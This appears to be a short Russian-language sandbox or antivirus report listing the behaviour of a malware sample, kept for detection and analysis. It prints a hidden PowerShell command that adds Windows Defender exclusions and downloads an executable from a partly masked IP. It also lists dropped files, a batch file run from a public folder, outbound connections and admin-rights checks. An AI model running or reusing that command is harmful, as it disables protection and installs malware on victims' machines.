Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users;Invoke-WebRequest 18#.#48.3.216/Ujkflzer45sc0 -OutFile Ujkflzer45sc0.e...
- C:\users\public\music\setup.exe
- C:\users\public\music\ppmjkjjkgbgb.bat
- nul
- %TEMP%\fcinst-1041817e3188732c\setup.exe
- '34.##9.100.209':443
- '34.##9.100.209':443
- ClassName: 'EDIT' WindowName: ''
- 'C:\users\public\music\setup.exe'
- '%TEMP%\fcinst-1041817e3188732c\setup.exe'
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Music\ppmjkjjkgbgb.bat" "
- '<SYSTEM32>\net.exe' session
- '<SYSTEM32>\net1.exe' session